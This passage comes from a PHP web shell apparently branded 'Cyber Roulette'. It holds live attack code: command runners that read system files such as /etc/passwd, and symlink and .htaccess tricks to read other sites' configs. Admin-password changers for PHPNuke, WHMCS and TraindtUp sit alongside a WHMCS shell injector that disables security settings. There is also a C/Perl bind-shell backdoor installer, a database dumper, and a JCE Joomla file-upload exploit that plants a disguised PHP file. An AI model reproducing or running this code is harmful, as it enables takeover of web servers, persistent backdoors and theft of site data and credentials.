7338 <option name='processsta'>Process status</option>
7339 <option name='syslog'>Syslog</option>
7340 <option name='resolv'>Resolv</option>
7341 <option name='hosts'>Hosts</option>
7342 <option name='passwd'>Passwd</option>
7343 <option name='cpuinfo'>Cpuinfo</option>
7344 <option name='version'>Version</option>
7345 <option name='sbin'>Sbin</option>
7346 <option name='interrupts'>Interrupts</option>
7347 <option name='lsattr'>lsattr</option>
7348 <option name='uptime'>Uptime</option>
7349 <option name='fstab'>Fstab</option>
7350 <option name='hddspace'>HDD Space</option>
7351 </select>
7352 <input type='submit' class='inputzbut' name='submitnonwinprocess' value=' >> '>
7353 </form>
7354 "; } $windowsprocess = $_POST['windowsprocess']; $nonwindowsprocess = $_POST['nonwindowsprocess']; if ($windowsprocess=="System Info") $winruncom = "systeminfo"; if ($windowsprocess=="Active Connections") $winruncom = "netstat -an"; if ($windowsprocess=="Running Services") $winruncom = "net start"; if ($windowsprocess=="User Accounts") $winruncom = "net user"; if ($windowsprocess=="Show Computers") $winruncom = "net view"; if ($windowsprocess=="ARP Table") $winruncom = "arp -a"; if ($windowsprocess=="IP Configuration") $winruncom = "ipconfig /all"; if ($nonwindowsprocess=="Process status") $systeminfo = "ps aux"; if ($nonwindowsprocess=="Syslog") $winruncom = "cat /etc/syslog.conf"; if ($nonwindowsprocess=="Resolv") $winruncom = "cat /etc/resolv.conf"; if ($nonwindowsprocess=="Hosts") $winruncom = "cat /etc/hosts"; if ($nonwindowsprocess=="Passwd") $winruncom = "cat /etc/passwd"; if ($nonwindowsprocess=="Cpuinfo") $winruncom = "cat /proc/cpuinfo"; if ($nonwindowsprocess=="Version") $winruncom = "cat /proc/version"; if ($nonwindowsprocess=="Sbin") $winruncom = "ls -al /usr/sbin"; if ($nonwindowsprocess=="Interrupts") $winruncom = "cat /proc/interrupts"; if ($nonwindowsprocess=="lsattr") $winruncom = "lsattr -va"; if ($nonwindowsprocess=="Uptime") $winruncom = "uptime"; if ($nonwindowsprocess=="Fstab") $winruncom = "cat /etc/fstab"; if ($nonwindowsprocess=="HDD Space") $winruncom = "df -h"; if (isset($winruncom)) { echo "<table class='cmdbox'>
7355 <tbody><tr>
7356 <td colspan='2'>
7357 <textarea class='output' name='content'>".exe($winruncom)."</textarea>
7358 </td></tr></table></center>"; } if (isset($systeminfo)) { echo "<br><br>"; processc99(); } } elseif(isset($_GET['x']) && ($_GET['x'] == 'hack-db')) { ?>
7359 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'forbidden')) { ?>
7360 <form action="?y=<?php echo $pwd; ?>&x=forbidden" method="post">
7361 <?php if($_POST['generateForbidden']) { @chdir($_POST['forbiddenPath']); @mkdir('forbidden'); @chdir('forbidden'); $htaccess = fopen('.htaccess','w+'); if($_POST['403'] == 'DirectoryIndex') { fwrite($htaccess,"DirectoryIndex in.txt"); } elseif($_POST['403'] == 'HeaderName') { fwrite($htaccess,"HeaderName in.txt"); } elseif($_POST['403'] == 'TXT') { fwrite($htaccess,"
7362 Options Indexes FollowSymLinks
7363 addType txt .php
7364 AddHandler txt .php"); } elseif($_POST['403'] == '404') { fwrite($htaccess,"
7365 ErrorDocument 404 /404.html
7366 404.html = Symlinked in.txt "); } elseif($_POST['403'] == 'ReadmeName') { fwrite($htaccess,"ReadmeName in.txt"); } elseif($_POST['403'] == 'footerName') { fwrite($htaccess,"footerName in.txt"); } echo "
7367Now Go To [ forbidden ] Dir And Then make The Shortcut [ in.txt ]
7368EX : ln -s /home/user/public_html/config.php in.txt"; } echo "<br><br><center><form method=POST><input type='text' style='color:#FF0000;background-color:#000000' value='".getcwd()."' name='forbiddenPath' size='30%'/><select style='color:#FF0000;background-color:#000000' name='403'><option value='DirectoryIndex'>DirectoryIndex</option><option value='HeaderName'>HeaderName</option><option value='TXT'>TXT</option><option value='404'>404</option><option value='ReadmeName'>ReadmeName</option><option value='footerName'>footerName</option> </select>
7369<input type='submit' style='color:#FF0000;background-color:#000000' value='Generate' name='generateForbidden'></form></center>"; ?>
7370 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mailbomb')) { ?>
7371 <form action="?y=<?php echo $pwd; ?>&x=mailbomb" method="post">
7372 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://iearn-india.org/upload/ar.php" width="100%"></iframe>
7373 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'phpnuke')) { ?>
7374 <form action="?y=<?php echo $pwd; ?>&x=phpnuke" method="post">
7375 <?php echo "<html><head><title>PHPNukeLoginChanger</title></head>"; echo "<body><center>
7376<h2>^_^ Cyber Roulette ^_^</h2>
7377<h3>PHPNuke UsEr-PaSs FuCk3r</h3>
7378<form method=POST action=''>
7379DB HOST<br/>
7380<input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
7381DB NAME<br/>
7382<input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
7383DB USER<br/>
7384<input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
7385DB PASSWORD<br/>
7386<input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
7387<hr style='color:lime;'>
7388
7389TARGET PREFIX<br/>
7390<input style='color:lime;background-color:#000000' type=txt name=prefix size='20'><br/>
7391NEW ADMIN LOGIN USER<br/>
7392<input value=admin style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
7393NEW ADMIN LOGIN PASS<br/>
7394<input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
7395
7396<input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>"; $anu1 = $_POST['anu1']; $anu2 = $_POST['anu2']; $anu3 = $_POST['anu3']; $anu4 = $_POST['anu4']; @mysql_connect($anu1,$anu3,$anu4); @mysql_select_db($anu2); $userbaru=str_replace("\'","'",$userbaru); $ganti_user = $_POST['userbaru']; $passbaru=str_replace("\'","'",$passbaru); $hash_pass = $_POST['passbaru']; $ganti_pass = md5($hash_pass); $prefix = $_POST['prefix']; $table_name1 = $prefix."users" ; $table_name2 = $prefix."authors" ; $okenuke1 = "UPDATE $table_name1 SET username ='".$ganti_user."' WHERE user_id ='2'"; $okenuke2 = "UPDATE $table_name1 SET user_password ='".$ganti_pass."' WHERE user_id ='2'"; $okenuke3= "UPDATE $table_name2 SET aid ='".$ganti_user."' WHERE radminsuper ='1'"; $okenuke4 = "UPDATE $table_name2 SET pwd ='".$ganti_pass."' WHERE radminsuper ='1'"; $oke=@mysql_query($okenuke1); $oke=@mysql_query($okenuke2); $oke=@mysql_query($okenuke3); $oke=@mysql_query($okenuke4); if($oke) { echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'whmtool')) { ?>
7397 <form action="?y=<?php echo $pwd; ?>&x=whmtool" method="post">
7398 <?php echo "<html><head><title>Whmcs Tools</title></head>"; echo "<body><center>
7399<h2>--=[~] Cyber Roulette [~]=--</h2>
7400<h3>WHMCS Inject Shell | Auto Bypass Security Token | Login Changer Tools</h3>
7401<form method=POST action=''>
7402<p>
7403WHMCS DB HOST<br/>
7404<input value=localhost style='color:lime;background-color:#000000' type=text name=anu1 size='40'><br/>
7405WHMCS DB NAME<br/>
7406<input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
7407WHMCS DB USERNAME<br/>
7408<input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
7409WHMCS DB PASSWORD<br/>
7410<input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/> <hr style='color:lime;'> <p>TARGET ID ADMIN MAHO<br/>
7411<input value='1' style='color:lime;background-color:#000000' type=text name=idmaho size='20'><br/>
7412NEW ADMIN LOGIN USER<br/>
7413<input value=admin style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
7414NEW ADMIN LOGIN PASS<br/>
7415<input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/>
7416SHELL TYPE {PHP}<br/>
7417<textarea style='color:lime;background-color:#000000' rows='10' cols='80'
7418name=shell>{php}eval(base64_decode('$c0de = base64_decode('GIF89aP;<p align="center">
7419
7420<?php
7421error_reporting(0);
7422$scriptname = $_SERVER['SCRIPT_NAME'];
7423$filename = $_POST["filename"];
7424if($_POST["submit"] == "Open")
7425{
7426if(file_exists($filename))
7427{
7428$filecontents = htmlentities(file_get_contents($filename));
7429if(!$filecontents)
7430$status = "<font face='Verdana' style='font-size: 8pt'>Error Nothing File</font>";
7431}
7432else
7433$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
7434}
7435else if($_POST["submit"] == "Delete")
7436{
7437if(file_exists($filename))
7438{
7439if(unlink($filename))
7440$status = "<font face='Verdana' style='font-size: 8pt'>File successfully deleted!</font>";
7441else
7442$status = "<font face='Verdana' style='font-size: 8pt'>Could not delete file!</font>";
7443}
7444else
7445$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
7446}
7447else if($_POST["submit"] == "Save")
7448{
7449$filecontents = stripslashes(html_entity_decode($_POST["contents"]));
7450if(file_exists($filename))
7451unlink($filename);
7452$handle = fopen($filename, "w");
7453if(!$handle)
7454$status = "<font face='Verdana' style='font-size: 8pt'>Could not open file for write access! </font>";
7455else
7456{
7457if(!fwrite($handle, $filecontents))
7458$status = $status."<font face='Verdana' style='font-size: 8pt'>Could not write to file! (Maybe you didn't enter any text?)</font>";
7459fclose($handle);
7460}
7461$filecontents = htmlentities($filecontents);
7462}
7463else
7464{
7465$status = "<font face='Verdana' style='font-size: 8pt'>No file loaded!</font>";
7466}
7467?>
7468<table border="0" align="center"><tr><td><table width="100%" border="0"><tr><td>
7469<form method="post" action="<?Echo $scriptname;?>">
7470<input style="color:lime;background-color:#000000" name="filename" type="text" value="<?Echo $filename;?>" size="72">
7471<input type="submit" style="color:lime;background-color:#000000" name="submit" value="Open">
7472<input type="submit" style="color:lime;background-color:#000000" name="submit" value="Delete"></td></tr></table>
7473<font face="Verdana" style="font-size: 11pt">
7474<textarea name="contents" style="color:lime;background-color:#000000" cols="70" rows="25">
7475<?Echo $filecontents;?></textarea></font><br>
7476<input type="submit" style="color:lime;background-color:#000000" name="submit" value="Save">
7477<input type="reset" style="color:lime;background-color:#000000" value="Reset">
7478</form>
7479<p>
7480<h3>_UPLOAD FILE_<h3>
7481
7482<?php
7483
7484echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
7485
7486echo 'PATH TARGET : <input name="uploadto" style="color:lime;background-color:#000000" type="text" size="50" value="'.getcwd().'"><br />';
7487echo '<input type="file" style="color:lime;background-color:#000000" name="file" size="30"><input name="_upl" style="color:lime;background-color:#000000" type="submit" id="_upl" value="Upload"></form>';
7488if( $_POST['_upl'] == "Upload" ) {
7489if(@copy($_FILES['file']['tmp_name'], $_POST['uploadto'].'/'.$_FILES['file']['name'])) {
7490
7491echo '<font color="lime">[+] Upload Sukses :v <br/> [+] '.$_POST['uploadto']."/".$_FILES['file']['name'];
7492} else {
7493echo '[~] Upload Failed T_T [~]</font><br>';
7494} }
7495?>
7496');
7497
7498$fopen = fopen ('dm.php','w');
7499$write = fwrite($fopen , $c0de);'));{/php}</textarea><br/>
7500
7501<p><input type=submit style='color:lime;background-color:#000000' value=' >> GO >> ' ></form>
7502<p>[~] Coded By <a href='hxxps://www.facebook.com/r00t.info/'>olivia48</a> <br/>
7503[~] Thanks To FB Group <a href='hxxps://www.facebook.com/r00t.info/'>JCA</a> <br/>
7504[~] Thanks To All Member JCA"; $anu1 = $_POST['anu1']; $anu2 = $_POST['anu2']; $anu3 = $_POST['anu3']; $anu4 = $_POST['anu4']; @mysql_connect($anu1,$anu3,$anu4); @mysql_select_db($anu2); $shell=str_replace("'","'",$shell); $gosok_shell = $_POST['shell']; $idmaho=str_replace("\'","'",$idmaho); $target_id = $_POST['idmaho']; $userbaru=str_replace("\'","'",$userbaru); $ganti_user = $_POST['userbaru']; $passbaru=str_replace("\'","'",$passbaru); $hash_pass = $_POST['passbaru']; $ganti_pass = md5($hash_pass); $colok1 = "UPDATE tblemailtemplates SET message ='".$gosok_shell."' WHERE id ='9'"; $colok2 = "UPDATE tbladmins SET username ='".$ganti_user."' WHERE id ='".$target_id."'"; $colok3 = "UPDATE tbladmins SET password ='".$ganti_pass."' WHERE id ='".$target_id."'"; $crot1 = "UPDATE tblconfiguration SET value='' WHERE setting='InvalidLoginBanLength'"; $crot2 = "UPDATE tblconfiguration SET value='' WHERE setting='AdminForceSSL'"; $crot3 = "UPDATE tblconfiguration SET value='' WHERE setting='RequiredPWStrength'"; $crot4 = "UPDATE tblconfiguration SET value='' WHERE setting='MaintenanceMode'"; $crot5 = "UPDATE tblconfiguration SET value='' WHERE setting='APIAllowedIPs'"; $crot6 = "UPDATE tblconfiguration SET value='' WHERE setting='LoginFailures'"; $crot7 = "UPDATE tblconfiguration SET value='' WHERE setting='InstanceID'"; $crot8 = "UPDATE tblconfiguration SET value='' WHERE setting='WhitelistedIPs'"; $crot9 = "UPDATE tblconfiguration SET value='' WHERE setting='ToggleInfoPopup'"; $crot10 = "UPDATE tblconfiguration SET value='' WHERE setting='token_namespaces'"; $udah_ganteng=@mysql_query($crot1); $udah_ganteng=@mysql_query($crot2); $udah_ganteng=@mysql_query($crot3); $udah_ganteng=@mysql_query($crot4); $udah_ganteng=@mysql_query($crot5); $udah_ganteng=@mysql_query($crot6); $udah_ganteng=@mysql_query($crot7); $udah_ganteng=@mysql_query($crot8); $udah_ganteng=@mysql_query($crot9); $udah_ganteng=@mysql_query($crot10); $udah_ganteng=@mysql_query($colok1); $udah_ganteng=@mysql_query($colok2); $udah_ganteng=@mysql_query($colok3); if($udah_ganteng) { echo "<font color='lime'>SUKSES BOS GANTENG :P</font>"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'unzip')) { ?>
7505 <form action="?y=<?php echo $pwd; ?>&x=unzip" method="post">
7506 <?php $file = $_POST['file']; if (isset($file)) { echo "<b>[+] PROSES BONGKAR [+]</b><br><br>"; system('unzip -o ' . $file); exit; } $handler = opendir("."); echo "<br><br><b>Pilih File Yg Mau Di Unzip :<b><br> " . "<br>"; echo '<form action="" method="get">'; $found = false; while ($file = readdir($handler)) { if (preg_match ("/.zip$/i", $file)) { echo '<input type="radio" name="file" value=' . $file . '> ' . $file . '<br>'; $found = true; } } closedir($handler); if ($found == false) echo "<br><br><b>[+] GA ADA FILE EXTENSI ZIP [+]<b><br>"; else echo '<br><br><INPUT type="submit" value="HAJAR BRAY :v">'; echo "</form>"; ?>
7507 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcsploit')) { ?>
7508 <form action="?y=<?php echo $pwd; ?>&x=whmcsploit" method="post">
7509 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://rubiq.co.za/administrator/whmcs.php" width="100%"></iframe>
7510 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mysqlback')) { ?>
7511 <form action="?y=<?php echo $pwd; ?>&x=mysqlback" method="post">
7512 <?php echo '<center><br><br><br>
7513<table class="tabnet" border=1 width=400 style="border-collapse: collapse" cellpadding=2>
7514<tr>
7515<td width=400 colspan=2 ><p align=center>
7516<b><font face=Arial size=2 >Backup Database</font></b>
7517</td></tr>
7518<tr>
7519<td width=150>
7520<font face=Arial size=2>DB Type:</font></td>
7521<td width=250>
7522<form method=post action="'.$me.'">
7523<select class="inputz" name=method>
7524<option value="gzip">Gzip</option>
7525<option value="sql">Sql</option>
7526</select></td></tr>
7527<tr>
7528<td width=150>
7529<font face=Arial size=2>Server:</font>
7530</td>
7531<td width=250>
7532<input type=text class="inputz" name=server value=localhost size=35>
7533</td></tr>
7534<tr>
7535<td width=150><font face=Arial size=2>Username:</font></td>
7536<td width=250><input type=text class="inputz" name=username size=35></td>
7537</tr>
7538<tr>
7539<td width=150><font face=Arial size=2>Password:</font></td>
7540<td width=250><input type=text class="inputz" name=password></td>
7541</tr>
7542<tr>
7543<td width=150><font face=Arial size=2>Data Base Name:</font></td>
7544<td width=250><input type=text class="inputz" name=dbname></td>
7545</tr>
7546<tr>
7547<td width=400 colspan=2><center><input class="inputzbut" type=submit value=" Dump! " ></td>
7548</tr>
7549</table></form></center></table>'; if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){ $date = date("Y-m-d"); $dbserver = $_POST['server']; $dbuser = $_POST['username']; $dbpass = $_POST['password']; $dbname = $_POST['dbname']; $file = "Dump-$dbname-$date"; $method = $_POST['method']; if ($method=='sql'){ $file="Dump-$dbname-$date.sql"; $fp=fopen($file,"w"); }else{ $file="Dump-$dbname-$date.sql.gz"; $fp = gzopen($file,"w"); } function write($data) { global $fp; if ($_POST['method']=='sql'){ fwrite($fp,$data); }else{ gzwrite($fp, $data); }} function filesize_n($path) { $size = @filesize($path); if( $size < 0 ){ ob_start(); system('ls -al "'.$path.'" | awk \'BEGIN {FS=" "}{print $5}\''); $size = ob_get_clean(); } return $size; } function format_size($size) { $sizes = array(" Bytes", " KB", " MB", " GB", " TB", " PB", " EB", " ZB", " YB"); if ($size == 0) { return('n/a'); } else { return (round($size/pow(1024, ($i = floor(log($size, 1024)))), $i > 1 ? 2 : 0) . $sizes[$i]); } } mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $tables = mysql_query ("SHOW TABLES"); while ($i = mysql_fetch_array($tables)) { $i = $i['Tables_in_'.$dbname]; $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i)); write($create['Create Table'].";\n\n"); $sql = mysql_query ("SELECT * FROM ".$i); if (mysql_num_rows($sql)) { while ($row = mysql_fetch_row($sql)) { foreach ($row as $j => $k) { $row[$j] = "'".mysql_escape_string($k)."'"; } write("INSERT INTO $i VALUES(".implode(",", $row).");\n"); } } } if ($method=='sql'){ fclose ($fp); }else{ gzclose($fp);} $sizedatabasefile = filesize_n($file); $sizehumanreadable = format_size($sizedatabasefile); echo "<br><br>
7550<center><font color='#FF0000'>Download Database -> </font>
7551<a href='$file'>Here</a>
7552<font color='#FF0000'> | DatabaseFileSize -> $sizehumanreadable </font></center>"; flush(); } } elseif(isset($_GET['x']) && ($_GET['x'] == 'traintup')) { ?>
7553 <form action="?y=<?php echo $pwd; ?>&x=traintup" method="post">
7554 <?php echo "<html><head><title>TraindtUpLoginChanger</title></head>"; echo "<body><center>
7555<h2>^_^ Cyber Roulette ^_^</h2>
7556<h3>TraindtUp UsEr-PaSs FuCk3r</h3>
7557<form method=POST action=''>
7558DB HOST<br/>
7559<input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
7560DB NAME<br/>
7561<input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
7562DB USER<br/>
7563<input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
7564DB PASSWORD<br/>
7565<input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
7566<hr style='color:lime;'> <p>TARGET ID ADMIN MAHO<br/>
7567<input value='1' style='color:lime;background-color:#000000' type=text name=idmaho size='20'><br/>
7568NEW ADMIN LOGIN USER<br/>
7569<input value=admin-ganteng style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
7570NEW ADMIN LOGIN PASS<br/>
7571<input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
7572
7573<input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>"; $anu1 = $_POST['anu1']; $anu2 = $_POST['anu2']; $anu3 = $_POST['anu3']; $anu4 = $_POST['anu4']; @mysql_connect($anu1,$anu3,$anu4); @mysql_select_db($anu2); $idmaho=str_replace("\'","'",$idmaho); $target_id = $_POST['idmaho']; $userbaru=str_replace("\'","'",$userbaru); $ganti_user = $_POST['userbaru']; $passbaru=str_replace("\'","'",$passbaru); $hash_pass = $_POST['passbaru']; $ganti_pass = md5($hash_pass); $sodok1 = "UPDATE admin SET admin_user ='".$ganti_user."' WHERE admin_id ='".$target_id."'"; $sodok2 = "UPDATE admin SET admin_password ='".$ganti_pass."' WHERE admin_id ='".$target_id."'"; $oke=@mysql_query($sodok1); $oke=@mysql_query($sodok2); if($oke) { echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'bind')) { ?>
7574 <form action="?y=<?php echo $pwd; ?>&x=bind" method="post">
7575 <?php if($_POST['bind']) { if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); Exe('gcc -o bdc bdc.c'); Exe('chmod 777 bdc'); @unlink("bdc.c"); Exe("./bdc ".$port." ".$passwrd." &"); $scan = Exe("ps aux"); if(eregi("./bdc $por",$scan)) { $msg = "Process found running, backdoor setup successfully."; } else { $msg = "Process not found running, backdoor not setup successfully."; } } elseif (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); Exe("chmod 777 bdp"); $p2=which("perl"); Exe($p2." bdp ".$port." &"); $scan = Exe("ps aux"); if(eregi("$p2 bdp $port",$scan)) { $msg = "Process found running, backdoor setup successfully."; } else { $msg = "Process not found running, backdoor not setup successfully."; } } } echo "</textarea>"; echo "<br><br><center><form method=POST><input style='color:#FF0000;background-color:#000000' type='text' name='bind_pass' size='26' value='".gethostbyname($_SERVER["hxxp_HOST"])."'><input type='text' name='port' style='color:#FF0000;background-color:#000000'size='26' value='443'><select style='color:#FF0000;background-color:#000000' name='use'><option value='Perl'>Perl</option><option value='C'>C</option></select> <input class='inputzbut' type='submit' name='bind' value='Bind' style='width:120px'></form></center>"; ?>
7576 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'ascii')) { ?>
7577 <form action="?y=<?php echo $pwd; ?>&x=ascii" method="post">
7578 <center><H1>This tools maded for you to Encode ASCII to Hex for your Nice SQL Injection ;)</H1></center>
7579 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://www.asciitohex.com/" width="100%"></iframe>
7580 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'jce')) { ?>
7581 <form action="?y=<?php echo $pwd; ?>&x=jce" method="post">
7582 <?php error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); echo'<html>
7583<head>
7584<title>JCE Joomla Extension Remote File Upload</title>
7585</head>
7586
7587<body bgcolor="#00000">
7588
7589<p align="center"><font size="4" color="#00ff00">JCE Joomla Extension Remote File Upload</font></p>
7590</font>
7591<table width="90%">
7592 <tbody>
7593 <tr>
7594 <td width="43%" align="left">
7595 <form name="form1" action="'.$SERVER[PHP_SELF].'" enctype="multipart/form-data" method="post">
7596 <p></font><font color="#00ff00" > hostname (ex:www.sitename.com): </font><input class="inputz" name="host" size="20"> <span class="Stile5"><font color="#FF0000">*</span></p>
7597 <p></font><font color="#00ff00" > path (ex: /joomla/ or just / ): </font><input class="inputz" name="path" size="20"> <span class="Stile5"><font color="#FF0000">*</span></p>
7598 <p></font><font color="#00ff00" >Please specify a file to upload: </font><input class="inputz" type="file" name="datafile" size="40"><font color="#FF0000"> * </font>
7599 <p><font color="#00ff00" > specify a port (default is 80): </font><input class="inputz" name="port" size="20"><span class="Stile5"></span></p>
7600 <p><font color="#00ff00" > Proxy (ip:port): </font><input class="inputz" name="proxy" size="20"><span class="Stile5"></span></p>
7601 <p align="center"> <span class="Stile5"><font color="#FF0000">* </font><font color="white" >fields are required</font></font></span></p>
7602 <p><input type="submit" value="Start" name="Submit"></p>
7603 </form>
7604 </td>
7605 </tr>
7606 </tbody>
7607</table>
7608</body></html>'; function sendpacket($packet,$response = 0,$output = 0,$s=0) { $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; global $proxy, $host, $port, $html, $user, $pass; if ($proxy == '') { $ock = fsockopen($host,$port); stream_set_timeout($ock, 5); if (!$ock) { echo '<font color=white> No response from '.htmlentities($host).' ...<br></font>'; die; } } else { $parts = explode(':',$proxy); echo '<font color=white>Connecting to proxy: '.$parts[0].':'.$parts[1].' ...<br><br/></font>'; $ock = fsockopen($parts[0],$parts[1]); stream_set_timeout($ock, 5); if (!$ock) { echo '<font color=white>No response from proxy...<br></font>'; die; } } fputs($ock,$packet); if ($response == 1) { if ($proxy == '') { $html = ''; while (!feof($ock)) { $html .= fgets($ock); } } else { $html = ''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html .= fread($ock,1); } } } else $html = ''; fclose($ock); if ($response == 1 && $output == 1) echo nl2br(htmlentities($html)); if ($s==1){ $count=0; $res=nl2br(htmlentities($html)); $str = array('2.0.11</title','2.0.12</title','2.0.13</title','2.0.14</title','2.0.15</title','1.5.7.10</title','1.5.7.11</title','1.5.7.12</title','1.5.7.13</title','1.5.7.14</title'); foreach ($str as $value){ $pos = strpos($res, $value); if ($pos === false) { $count=$count++; } else { echo "<font color=white>Target patched.<br/><br/></font>"; die(); } } if ($count=10) echo '<font color=white>Target is exploitable.<br/><br/></font>'; } } $host = $_POST['host']; $path = $_POST['path']; $port = $_POST['port']; $proxy = $_POST['proxy']; if (isset($_POST['Submit']) && $host != '' && $path != '') { $port=intval(trim($port)); if ($port=='') {$port=80;} if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('<font color=white>Error... check the path!</font>');} if ($proxy=='') {$p=$path;} else {$p='hxxp://'.$host.':'.$port.$path;} $host=str_replace("\r\n","",$host); $path=str_replace("\r\n","",$path); $packet = "GET ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 hxxp/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n"; sendpacket($packet,1,0,1); $content = "GIF89a1\n"; $content .= file_get_contents($_FILES['datafile']['tmp_name']); $data = "-----------------------------41184676334\r\n"; $data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n"; $data .= "/\r\n"; $data .= "-----------------------------41184676334\r\n"; $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n"; $data .= "Content-Type: application/octet-stream\r\n\r\n\r\n"; $data .= "-----------------------------41184676334\r\n"; $data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n"; $data .= "0\r\n"; $data .= "-----------------------------41184676334\r\n"; $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"0day.gif\"\r\n"; $data .= "Content-Type: image/gif\r\n\r\n"; $data .= "$content\r\n"; $data .= "-----------------------------41184676334\r\n"; $data .= "0day\r\n"; $data .= "-----------------------------41184676334\r\n"; $data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n"; $data .= "upload\r\n"; $data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n"; $packet = "POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 hxxp/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n"; $packet .= "Accept-Language: en-us,en;q=0.5\r\n"; $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n"; $packet .= "Connection: Close\r\n"; $packet .= "Proxy-Connection: close\r\n"; $packet .= "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n"; $packet .= $data; sendpacket($packet,0,0,0); $packet = "POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 hxxp/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n"; $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; $packet .= "Accept-Language: en-US,en;q=0.8\r\n"; $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n"; $packet .= "Accept-Encoding: deflate\n"; $packet .= "X-Request: JSON\r\n"; $packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n"; $ren ="json={\"fn\":\"folderRename\",\"args\":[\"/0day.gif\",\"0day.php\"]}"; $packet .= "Content-Length: ".strlen($ren)."\r\n\r\n"; $packet .= $ren."\r\n\r\n"; sendpacket($packet,1,0,0); $packet = "Head ".$p."/images/stories/0day.php hxxp/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n"; sendpacket($packet,1,0,0); if(stristr($html , '200 OK') != true) {echo "<font 